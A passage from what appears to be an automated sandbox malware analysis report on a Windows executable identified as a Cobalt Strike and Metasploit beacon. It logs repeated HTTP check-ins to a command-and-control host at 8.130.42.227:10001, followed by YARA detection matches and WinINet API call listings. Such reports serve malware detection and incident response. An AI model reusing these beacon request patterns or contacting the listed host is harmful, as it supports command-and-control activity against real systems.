                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:09.922214985 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:09 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                131192.168.2.4498688.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:32.580897093 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:33.550673008 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:33 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                132192.168.2.4498698.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:33.674436092 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:34.629899979 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:34 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                133192.168.2.4498708.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:34.748933077 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:35.695903063 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:35 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                134192.168.2.4498718.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:35.925762892 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:36.920609951 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:36 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                135192.168.2.4498728.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:37.045258999 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:38.425457954 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:37 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0
                                                                Oct 1, 2024 09:19:38.425618887 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:37 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                136192.168.2.4498738.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:38.556296110 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:39.518117905 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:39 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                137192.168.2.4498748.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:39.638994932 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:40.587492943 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:40 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                138192.168.2.4498758.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:40.708197117 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:42.136219025 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:41 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0
                                                                Oct 1, 2024 09:19:42.136311054 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:41 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                139192.168.2.4498768.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:42.250993967 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:43.230906010 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:43 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                140192.168.2.4498778.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:43.342744112 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:44.303792000 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:44 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                141192.168.2.4498788.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:44.424791098 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:45.387233973 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:45 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                142192.168.2.4498798.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:45.516238928 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:46.466949940 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:46 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                143192.168.2.4498808.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:46.580837965 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:47.532047033 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:47 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                144192.168.2.4498818.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:47.654915094 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:48.613179922 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:48 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                145192.168.2.4498828.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:48.732733011 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:49.687880039 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:49 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                146192.168.2.4498838.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:49.816788912 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:50.784029961 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:50 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                147192.168.2.4498848.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:50.960016012 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:51.912849903 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:51 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                148192.168.2.4498858.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:52.029941082 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:52.973845005 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:52 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                149 | 192.168.2.4 | 49886 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:19:53.367117882 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:54.270142078 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:54 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0



                                                                Target ID:0
                                                                Start time:03:16:56
                                                                Start date:01/10/2024
                                                                Path:C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\7kSftA4Eoh.exe"
                                                                Imagebase:0x400000
                                                                File size:19'456 bytes
                                                                MD5 hash:71F8B8789A4B0AC3F057F1468579FC23
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                                • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:false

                                                                  Execution Graph

                                                                  Execution Coverage:2%
                                                                  Dynamic/Decrypted Code Coverage:72.1%
                                                                  Signature Coverage:11.8%
                                                                  Total number of Nodes:262
                                                                  Total number of Limit Nodes:17

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 0099E439
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                    • Part of subcall function 009A61A8: _snprintf.LIBCMT ref: 009A6315
                                                                  • _snprintf.LIBCMT ref: 0099E493
                                                                  • _snprintf.LIBCMT ref: 0099E4AA
                                                                  • HttpOpenRequestA.WININET ref: 0099E4EF
                                                                  • HttpSendRequestA.WININET ref: 0099E520
                                                                  • InternetQueryDataAvailable.WININET ref: 0099E550
                                                                  • InternetCloseHandle.WININET ref: 0099E56E
                                                                  • InternetReadFile.WININET ref: 0099E5AA
                                                                  • InternetCloseHandle.WININET ref: 0099E5CB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
